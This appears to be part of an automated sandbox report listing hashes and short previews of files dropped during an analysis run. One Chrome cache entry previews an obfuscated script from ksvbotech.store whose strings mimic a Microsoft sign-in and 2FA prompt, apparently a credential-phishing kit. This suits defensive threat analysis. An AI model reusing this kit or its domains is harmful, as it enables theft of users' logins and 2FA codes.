      SHA-256:D6CB2D3765173A40BD45C6DA9E7849AFC6ADEDCF2BCF03C773459164C5D5F42E
      SHA-512:F71258D04E7F611DCBF1FEC35E9B6B1CFFF4F5969D8E427A8A14C11286675472DBA0FA8C53A7B1E9519C18DB55225E2B61767DFD6E2DF29C3AADD9C738C18F72
      Malicious:false
      Reputation:unknown
      Preview:..............................

      C:\Users\user\AppData\Roaming\Microsoft\Outlook\NoEmail.srs

      Download File
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:Composite Document File V2 Document, Cannot read section info
      Category:dropped
      Size (bytes):16384
      Entropy (8bit):0.6691625330788578
      Encrypted:false
      SSDEEP:
      MD5:C9EFA865BF1B3CF89F099541559ED3C8
      SHA1:4911609661691F2C59B6C0E377D9B0DFB9DB5139
      SHA-256:81568452E8A90C96DC00C976341215772967037B4EFE88747C592A74EF839526
      SHA-512:8627A5CA8279C32256A9D517EF99A4CB56D34D76D025DBFA6CE592A905B3506A32337AC86D72F392247719A3BE12B0F1435E01A668340D43DB1AAD238011788F
      Malicious:false
      Reputation:unknown
      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

      Download File
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 19 08:36:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
      Category:dropped
      Size (bytes):2673
      Entropy (8bit):3.986975347354126
      Encrypted:false
      SSDEEP:
      MD5:3AB96404E61AE4D07A347CB3EFA14BDD
      SHA1:3516A017FCA0E4618DC2C2807353F1409328CE50
      SHA-256:289B547656CA08622A173A9B4A796AA176CFCE25732D197EAA2BE401A6A25006
      SHA-512:DAFA6295169187210A88A23AA0AD3A1C1D4DAB7E116CCB7E2D97D7996CA58603431D01A44B45C1562B3B22AEAA057413AA64A1452A4B8AA08440D30CC13A7EB0
      Malicious:false
      Reputation:unknown
      Preview:L..................F.@.. ...$+.,.......vw...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I3Y.L....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V3Y.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V3Y.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V3Y.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V3Y.L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............7.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

      Download File
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 19 08:36:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
      Category:dropped
      Size (bytes):2675
      Entropy (8bit):4.002511732556609
      Encrypted:false
      SSDEEP:
      MD5:D464D0A4BD02924CE1CB05FA6B449C38
      SHA1:8AB76B5D7A110FE718BC3D63B753DB63712579AB
      SHA-256:9CB483F60F1A30BBCC12012C1CD48020036A5B5B1B4E987A6A7649AB70A635F9
      SHA-512:6AC49333B537B49B416761AEA15612250B52F213CFA90ADC0EDD92CF91A237394773A716E2A8682C5C7268315ECE58C4B67D38CAF995BFF83ADA07C2F73FAF9F
      Malicious:false
      Reputation:unknown
      Preview:L..................F.@.. ...$+.,....t..vw...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I3Y.L....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V3Y.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V3Y.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V3Y.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V3Y.L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............7.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

      Download File
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
      Category:dropped
      Size (bytes):2689
      Entropy (8bit):4.007333538132257
      Encrypted:false
      SSDEEP:
      MD5:E8319CFAA68E1BDCC838B5041C01CE60
      SHA1:BA1A30686C77E52CF6D95771260C4391224E928A
      SHA-256:880A5F1F9F1E1B52941249A294B704D6B090F417F55ACC39CB0F8B0F3FD579F3
      SHA-512:0A8C9015B17AE6AC2F1811D04F5236203A6156659728861C2D1B64D4449D7C28E43EA6AB80C03C684B39383F26615076BAC87BBC0DE59B451C8896518E40DE6C
      Malicious:false
      Reputation:unknown
      Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I3Y.L....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V3Y.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V3Y.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V3Y.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............7.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

      Download File
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 19 08:36:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
      Category:dropped
      Size (bytes):2677
      Entropy (8bit):4.001784084079385
      Encrypted:false
      SSDEEP:
      MD5:4D48B1F79274B98C86AB36281229B366
      SHA1:2E59E37CC110033EBC7C75EFF9320E7BFB13E6D9
      SHA-256:AF8E620E368EA011FFBB236614CBFB164E1AB0E51E5ED3EB4ECF0B15A4F2653C
      SHA-512:827068C31DBA335641C99D8F480790F2331E91743D080C3CF66E23438A9C0E9F3D5BA18D46AA637EF172F7B41FD439032BC0566F9547B461161834C45A3BC1BC
      Malicious:false
      Reputation:unknown
      Preview:L..................F.@.. ...$+.,.......vw...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I3Y.L....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V3Y.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V3Y.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V3Y.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V3Y.L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............7.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

      Download File
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 19 08:36:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
      Category:dropped
      Size (bytes):2677
      Entropy (8bit):3.991186274283029
      Encrypted:false
      SSDEEP:
      MD5:AD4A8CC99C12E9BD95FF8D69F8C558FA
      SHA1:07684644FF731CA616E7581677FB176123794EB6
      SHA-256:AE7729943B1784769A5566EC8EA107E6B464D2DF900593D65938B4C1D42F1F90
      SHA-512:E4EF33F8FE665CC5E7EF49D0EC1B5B3BAD3A5FE94E9F632AEC4A7AF5ABF3F3A4BAA0BBCA727E15650C6A3FDB262F5E1DC53ACBAA5073BD3C4F1CD9053E8B3B63
      Malicious:false
      Reputation:unknown
      Preview:L..................F.@.. ...$+.,.......vw...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I3Y.L....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V3Y.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V3Y.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V3Y.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V3Y.L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............7.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

      Download File
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Sep 19 08:36:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
      Category:dropped
      Size (bytes):2679
      Entropy (8bit):3.9964833119593073
      Encrypted:false
      SSDEEP:
      MD5:CEFB6C01D3522E216287A7AE815E3D13
      SHA1:256EB752C66E23D5132121675262EEDD9AF60364
      SHA-256:8EDDCBF25FFFBAD61B65CC66202BDEE97D92B7482A0BA20DCD1DAB58D8890521
      SHA-512:1F763DD3D1ED00EADD89323A2D32C15E40B46711259FD0D04741A327E2E9A525EC96F41F95424784FAB4BB3E1401611466A2ECAA65E71291590CC20B3AB471E5
      Malicious:false
      Reputation:unknown
      Preview:L..................F.@.. ...$+.,......vw...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I3Y.L....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V3Y.L....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V3Y.L....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V3Y.L..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V3Y.L...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............7.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

      C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst

      Download File
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:Microsoft Outlook email folder (>=2003)
      Category:dropped
      Size (bytes):271360
      Entropy (8bit):4.126423415168088
      Encrypted:false
      SSDEEP:
      MD5:21D4F0DE55E7EFBA75CBA13896379558
      SHA1:5212C4C2BCAC40ED629D57FD7E89D28643F58E27
      SHA-256:88DA65C9B84830CA880B7193E4B171493C63DFC20CBCE16A1E01F74CBA945BB5
      SHA-512:8B3F503ED25DEBC5F550B777B436E77973F060BECCA57F6DF0D4C0F841C0E9DC11974E58AC032A3CFDBD7237A26465745B6CCA92806661243F426D81BB3EFC39
      Malicious:false
      Reputation:unknown
      Preview:!BDN....SM......\...i...................o................@...........@...@...................................@...........................................................................$.......D.......\..............~...............{...........................................................................................................................................................................................................................................................................................x........&. A.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

      C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp

      Download File
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
      File Type:data
      Category:dropped
      Size (bytes):262144
      Entropy (8bit):3.986057485153415
      Encrypted:false
      SSDEEP:
      MD5:B6911A6DF6A52C1A4E1692D79E47F1AB
      SHA1:DE803D225F8B9D21E63CC8FD936976925128AEC4
      SHA-256:E5E235D8C2DC853CFB7CAC285B665591AF271717242EB14C23470C7C88E47064
      SHA-512:68A1437A689CE56504C3DC893AFDE5909349AB29953D5A5F0B24D88B4EBCA089A017A1448A0797E6600A6DE4523B9D239D4167E39316D8BD45B3673B19461953
      Malicious:false
      Reputation:unknown
      Preview:..*C...h.............[ew.....................#.!BDN....SM......\...i...................o................@...........@...@...................................@...........................................................................$.......D.......\..............~...............{...........................................................................................................................................................................................................................................................................................x........&. A.....[ew........B............#.........................................................................................................................................................................................................................................................................................................................................................................................................

      Chrome Cache Entry: 80

      Download File
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (4191), with CRLF line terminators
      Category:downloaded
      Size (bytes):59006
      Entropy (8bit):4.8668087324631095
      Encrypted:false
      SSDEEP:
      MD5:A0E2B5673A02086C508B98283D3DA9AC
      SHA1:BDA752205408484FB54346DA969E09218384588F
      SHA-256:753A9F4EF8C9200639BD543B9D2B72565A2E62AF3F5DCDC5DB8EA3A7E34C6698
      SHA-512:780B582BBB2BA29C7AFC2268152A663E2744A3D2150555F478CA79AE11BBACCFDF1F7AE8F6100BF35EC17DA24130AFDD663DC64594A24A340C46ADC29F6ADAD8
      Malicious:false
      Reputation:unknown
      URL:https://ksvbotech.store/gesp/xls/0xa937eg29be0xcs.js
      Preview:var _0x7704 = [.. 'ready',.. '#ai',.. '#next',.. '.logoimg',.. 'src',.. 'https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico',.. '#div1',.. '#div2',.. '#aich',.. '#error',.. '#submit-btn',.. '#div4',.. '#verify-2fa',.. '#div5',.. '#sign-in-another-way',.. '#div6',.. '#verify-text-2fa',.. 'https://logo.clearbit.com/',.. 'show',.. '1|2|3|4|0',.. 'HEAD',.. '#pr',.. '#div3',.. 'success',.. '#user-email-otc',.. 'two_way_voice',.. '2|4|3|0|1',.. 'Your\x20account\x20or\x20password\x20is\x20incorrect.\x20If\x20you\x20don\x27t\x20remember\x20your\x20password,\x20<a\x20href=\x27#\x27>reset\x20it\x20now</a>',.. '1|4|0|2|3',.. 'Sorry,\x20your\x20sign-in\x20timed\x20out.\x20Please\x20sign\x20in\x20again.',.. '#msg',.. 'Internal\x20server\x20error.',.. 'JSON',.. '#msg-2fa',.. 'Incorrect\x202FA\x20code.\x20Try\x20again.',.. '#2fa-code',.. 'WebSocket\x20con

      Chrome Cache Entry: 81

      Download File
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with very long lines (32030)
      Category:downloaded
      Size (bytes):86709
      Entropy (8bit):5.367391365596119
      Encrypted:false
      SSDEEP:
      MD5:E071ABDA8FE61194711CFC2AB99FE104
      SHA1:F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
      SHA-256:85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
      SHA-512:53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
      Malicious:false
      Reputation:unknown
      URL:https://code.jquery.com/jquery-3.1.1.min.js
      Preview:/*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con

      Chrome Cache Entry: 82

      Download File
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with very long lines (32065)
      Category:downloaded
      Size (bytes):85578
      Entropy (8bit):5.366055229017455
      Encrypted:false
      SSDEEP:
      MD5:2F6B11A7E914718E0290410E85366FE9
      SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
      SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
      SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
      Malicious:false
      Reputation:unknown
      URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
      Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

      Chrome Cache Entry: 84

      Download File
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
      Category:dropped
      Size (bytes):17174
      Entropy (8bit):2.9129715116732746
      Encrypted:false
      SSDEEP:
      MD5:12E3DAC858061D088023B2BD48E2FA96
      SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
      SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
      SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
      Malicious:false
      Reputation:unknown
      Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

      Chrome Cache Entry: 87

      Download File
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):290960
      Entropy (8bit):5.1082980298031435
      Encrypted:false
      SSDEEP:
      MD5:24FA855A7678B1938F16235881E3E80B
      SHA1:67B6C9946134456D67C07765D230130D8679F8C6
      SHA-256:F2A84BC4F4CB8AE04162F42F1F3EBED1E05725D9B5BF666B885356C7698A071F
      SHA-512:D1EAB0379A8736F8B14E73478F101A2656912C7FBB9B7D90707E6E8F782C09BEC4B017EB86781E5B4D4AE8A37B3F89A931249527E839F28BEE1389DE21BD79C7
      Malicious:false
      Reputation:unknown
      Preview:/*!.. * jQuery JavaScript Library v3.4.1.. * https://jquery.com/.. *.. * Includes Sizzle.js.. * https://sizzlejs.com/.. *.. * Copyright JS Foundation and other contributors.. * Released under the MIT license.. * https://jquery.org/license.. *.. * Date: 2019-05-01T21:04Z.. */..( function( global, factory ) {....."use strict";.....if ( typeof module === "object" && typeof module.exports === "object" ) {......// For CommonJS and CommonJS-like environments where a proper `window`....// is present, execute the factory and get jQuery.....// For environments that do not have a `window` with a `document`....// (such as Node.js), expose a factory as module.exports.....// This accentuates the need for the creation of a real `window`.....// e.g. var jQuery = require("jquery")(window);....// See ticket #14549 for more info.....module.exports = global.document ?.....factory( global, true ) :.....function( w ) {......if ( !w.document ) {.......throw new Error( "jQuery requires a window with a docume

      Chrome Cache Entry: 88

      Download File
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with CRLF line terminators
      Category:downloaded
      Size (bytes):258912
      Entropy (8bit):4.694788011500782
      Encrypted:false
      SSDEEP:
      MD5:05738EAC5280D6EACED7AB392897073C
      SHA1:3C2BDCA7C6A7A768024EAB6CC4A6B5C889DC748A
      SHA-256:6975498938C7B4FF74896FEF5D515112EBA41C3B7963018B1F61D7DC3CC52BE6
      SHA-512:663ACA1568467E2A75388E18451D1F783BC818CFBAD8268B36F0C5365047B5373B6D86DB2A2291CB23892B9BD23E42E53CAFC8A1C7B84E6154DBB2416ACA1D42
      Malicious:false
      Reputation:unknown
      URL:https://sopbtech.store/start/xls/includes/css6.css
      Preview: /*!.. * Bootstrap v4.0.0 (https://getbootstrap.com).. * Copyright 2011-2018 The Bootstrap Authors.. * Copyright 2011-2018 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */.. :root {.. --blue: #007bff;.. --indigo: #6610f2;.. --purple: #6f42c1;.. --pink: #e83e8c;.. --red: #dc3545;.. --orange: #fd7e14;.. --yellow: #ffc107;.. --green: #28a745;.. --teal: #20c997;.. --cyan: #17a2b8;.. --white: #fff;.. --gray: #6c757d;.. --gray-dark: #343a40;.. --primary: #007bff;.. --secondary: #6c757d;.. --success: #28a745;.. --info: #17a2b8;.. --warning: #ffc107;.. --danger: #dc3545;.. --light: #f8f9fa;.. --dark: #343a40;.. --breakpoint-xs: 0;.. --breakpoint-sm: 576px;.. --breakpoint-md: 768px;.. --breakpoint-lg: 992px;.. --breakpoint-xl: 1200px;.. --font-family-sans-se

      Chrome Cache Entry: 90

      Download File
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:PNG image data, 181 x 173, 8-bit/color RGBA, non-interlaced
      Category:downloaded
      Size (bytes):8165
      Entropy (8bit):7.942645475708731
      Encrypted:false
      SSDEEP:
      MD5:39682C8C152FF6FE3A842EF1F37D4603
      SHA1:E7DB7D2EDEA3E51D6DDD42BCF9301F096F580FA6
      SHA-256:6CF799F2F4976F33994548A741B39D05097C35E3C991FB4DC6DB5E66F05B4B2B
      SHA-512:A3987B39165AB3D4F85F6549CE1A8388F41A8F9E675D087050AB663E5557C512B1650E6AE31D174739307FAFE012504051F73FD1BB1AB9EA9BA76C01C7851071
      Malicious:false
      Reputation:unknown
      URL:https://sopbtech.store/start/xls/images/key.png
      Preview:.PNG........IHDR...............>_....pHYs...#...#.x.?v...OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

      Chrome Cache Entry: 93

      Download File
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with very long lines (1235), with CRLF line terminators
      Category:downloaded
      Size (bytes):2043
      Entropy (8bit):5.950379171266168
      Encrypted:false
      SSDEEP:
      MD5:49D045AB3775B2E53EE278F3E2FFE692
      SHA1:9908DB5764D4C9AFB7F0D6FB1D7F29869E6CA7F2
      SHA-256:B3D4FEE6149D869169A8FDC78ADF513D3609034F05080CACE8943FD186335A76
